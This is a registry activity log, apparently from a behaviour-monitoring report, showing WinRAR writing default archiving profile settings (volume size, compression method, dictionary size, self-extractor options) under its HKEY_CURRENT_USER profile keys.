Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = CmtFile, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VolumeSize, data = 10485760, size = 18, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Solid, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RecEnabled, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = DictSizeLZ, data = 33554432, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = DictSize, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Name, data = Default Profile, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1, value_name = Name, data = Create e-mail attachment, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Name, data = Backup selected files, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Name, data = Create 10 MB volumes, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Name, data = ZIP archive (low compression), size = 60, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcName False 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileNames False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ExclNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = StoreNames, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = UseRAR, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXModule, size = 2, type = REG_SZ True 1
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFX False 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = CmtFile, size = 2, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Solid, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RecEnabled, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
